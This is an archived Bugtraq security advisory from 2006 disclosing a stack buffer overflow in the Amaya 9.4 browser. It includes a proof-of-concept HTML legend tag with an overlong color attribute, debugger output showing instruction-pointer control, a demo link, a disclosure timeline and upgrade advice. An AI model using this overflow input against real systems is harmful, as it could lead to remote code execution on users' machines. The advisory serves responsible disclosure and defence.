Bugtraq mailing list archives
[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2
From: bugtraq () morph3us org
Date: 12 Apr 2006 23:59:17 -0000
-----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 --------------------------------------------------- | BuHa Security-Advisory #11 | Apr 12th, 2006 | --------------------------------------------------- | Vendor | W3C's Amaya | | URL | http://www.w3.org/Amaya/ | | Version | <= 9.4 | | Risk | Critical (Remote Code Execution) | --------------------------------------------------- o Description: ============= The current releases, Amaya 9.5, is available for Linux, Windows and now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and includes SVG support (transformation, transparency, and SMIL animation). See the "Amaya Overview" page [1] for more details. o Stack overflow: ================ The following code snippet forces Amaya 9.4 to crash:
<legend color="Ax200">
eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
00516114 56 push esi
00516115 57 push edi
00516116 33ff xor edi,edi
00516118 33f6 xor esi,esi
0051611a 3bcf cmp ecx,edi
0051611c 893d943df101 mov [amaya+0x1b13d94
(01f13d94)],edi
00516122 7511 jnz amaya+0x116135 (00516135)
00516124 6a0a push 0xa
00516126 e825d80500 call amaya+0x173950 (00573950)
0051612b 83c404 add esp,0x4
0051612e 8bd7 mov edx,edi
00516130 8bc6 mov eax,esi
00516132 5f pop edi
00516133 5e pop esi
00516134 c3 ret
FAULT ->00516135 8b4134 mov eax,[ecx+0x34]
ds:0023:41414175=????????
00516138 3bc7 cmp eax,edi
0051613a 74f2 jz amaya+0x11612e (0051612e)
0051613c 8b4938 mov ecx,[ecx+0x38]
0051613f 5f pop edi
00516140 8bd1 mov edx,ecx
00516142 5e pop esi
00516143 c3 ret
Nopslide..
We are able to control the EIP:
<legend color= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAABBBB>
eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 Funktion: <nosymbols> No prior disassembly possible 42424242 ?? ??? 42424244 ?? ??? 42424246 ?? ??? 42424248 ?? ??? 4242424a ?? ??? 4242424c ?? ???
Online-demo: http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html In fact, sucessful exploitation of this vulnerability is not that easy because non-text characters were modfified during parsing therefore you have to find a place where to place the shellcode. Naturally you have to avoid null bytes too because Amaya would stop parsing the attribute value and the overflow would not get triggered. o Disclosure Timeline: ===================== 21 Dec 05 - Vulnerability discovered. 21 Feb 06 - Vendor contacted. 23 Feb 06 - Vendor confirmed vulnerability. 08 Mar 06 - Vendor fixed vulnerability. 12 Apr 06 - Public release. o Solution: ========== Upgrade to the latest version of Amaya. [2] o Credits: ========= Thomas Waldegger <bugtraq () morph3us org> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq () morph3us org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me. Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa. Advisory online: http://morph3us.org/advisories/20060412-amaya-94-2.txt [1] http://www.w3.org/Amaya/Amaya.html [2] http://www.w3.org/Amaya/User/BinDist.html -----BEGIN PGP SIGNATURE----- Version: n/a Comment: http://morph3us.org/ iD8DBQFEPYDPkCo6/ctnOpYRA+b0AJ0S4sWE2UE0WjMrFBeRKwmWWd9oIwCfSWdX MW1HldAZyLYolnZ8k/jA/Vw= =PeiV -----END PGP SIGNATURE-----
Current thread:
- [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2 bugtraq (Apr 13)